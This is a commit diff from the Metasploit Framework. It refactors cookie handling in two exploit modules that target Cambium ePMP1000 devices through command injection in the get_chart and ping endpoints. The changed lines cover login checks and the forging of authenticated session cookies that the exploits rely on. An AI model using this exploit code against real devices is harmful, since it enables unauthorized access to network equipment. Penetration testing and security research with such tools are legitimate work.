Get @jhart-r7's fixes for cookie tests

2017-12-19 09:03:51 -06:00 · 2017-12-19 09:03:51 -06:00 · 2fa1568151
parent 85350a9645 7b386ea2c8
commit 2fa1568151
2 changed files with 13 additions and 12 deletions
--- a/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb
+++ b/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb
@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote
      }
    )

+    cookies = res.get_cookies
    good_response = (
      res &&
      res.code == 200 &&
-      res.headers.include?('Set-Cookie') &&
-      res.headers['Set-Cookie'].include?('sysauth')
+      cookies.include?('sysauth')
    )

    if good_response
-      sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
+      sysauth_value = cookies.match(/((.*)[$ ])/)
      cookie1 = "#{sysauth_value}"
      prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/)

@ -158,10 +158,11 @@ class MetasploitModule < Msf::Exploit::Remote
        }
      )

+      cookies = res.get_cookies
      good_response = (
        res &&
        res.code == 200 &&
-        res.headers.include?('Set-Cookie') &&
+        !cookies.blank? &&
        !res.body.include?('auth_failed') &&
        !res.body.include?('Maximum number of users reached.')
      )
@ -170,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")

        # get the cookie now
-        sysauth_value_2 = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
+        sysauth_value_2 = cookies.match(/((.*)[$ ])/)
        stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/)
        stok_value_2 = "#{stok_value_2_dirty}".split('"')[3]
        final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}"
--- a/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb
+++ b/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb
@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote
      }
    )

+    cookies = res.get_cookies
    good_response = (
      res &&
      res.code == 200 &&
-      res.headers.include?('Set-Cookie') &&
-      res.headers['Set-Cookie'].include?('sysauth')
+      cookies.include?('sysauth')
    )

    if good_response
-      sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
+      sysauth_value = cookies.match(/((.*)[$ ])/)

      cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"

@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
        }
      )

+      cookies = res.get_cookies
      good_response = (
        res &&
        res.code == 200 &&
-        res.headers.include?('Set-Cookie') &&
-        res.headers['Set-Cookie'].include?('stok=') &&
+        cookies.include?('stok=') &&
        !res.body.include?('Maximum number of users reached.')
      )

@ -169,9 +169,9 @@ class MetasploitModule < Msf::Exploit::Remote
        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")

        # get the cookie now
-        get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/)
+        get_stok = cookies.match(/stok=(.*)/)
        stok_value = get_stok[1]
-        sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
+        sysauth_value = cookies.match(/((.*)[$ ])/)
        final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"

        # create config_uri